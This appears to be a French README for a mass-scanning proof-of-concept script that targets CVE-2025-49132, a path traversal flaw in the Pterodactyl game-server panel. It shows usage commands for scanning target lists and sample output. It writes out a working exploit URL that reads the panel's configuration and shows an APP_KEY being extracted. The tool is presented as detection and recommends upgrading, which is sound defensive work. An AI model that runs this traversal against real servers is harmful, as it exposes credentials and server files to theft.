
Détection en masse de CVE-2025-49132 sur le panneau Pterodactyl ☝️🤓
python3 CVE-2025-49132_poc.py -u http://pterodactyl.example.com
python3 CVE-2025-49132_poc.py -f 目标列表.txt
python3 CVE-2025-49132_poc.py -f 目标列表.txt -o 扫描结果.txt
Lorsque la vulnérabilité est présente :
[+] Vulnérabilité présente : Confirmation de vulnérabilité
Détails de la vulnérabilité :
• Type : Traversée de chemin
• Vecteur d'attaque : Accès à /locales/locale.json via un paramètre de traversée de chemin
• URL d'exploitation : http://target.com/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app
Impact potentiel :
• Lecture des identifiants dans le fichier de configuration du panneau (.env)
• Extraction d'informations sensibles dans la base de données
• Accès aux fichiers du serveur de jeu géré par le panneau
APP_KEY extraite : base64{{your_secret_key_here}}
Recommandation de correction : Mettre à jour immédiatement vers Pterodactyl v1.11.11 ou version ultérieure
Lorsque la vulnérabilité n'est pas présente :
[-] Pas de vulnérabilité : Aucune vulnérabilité (Code de statut : 404)
Résumé du scan :
Résumé du scan :
• Nombre total de cibles scannées : 5
• Cibles vulnérables : 2
• Cibles sécurisées : 3
[!] Critique : Systèmes vulnérables détectés ! Des mesures immédiates sont nécessaires.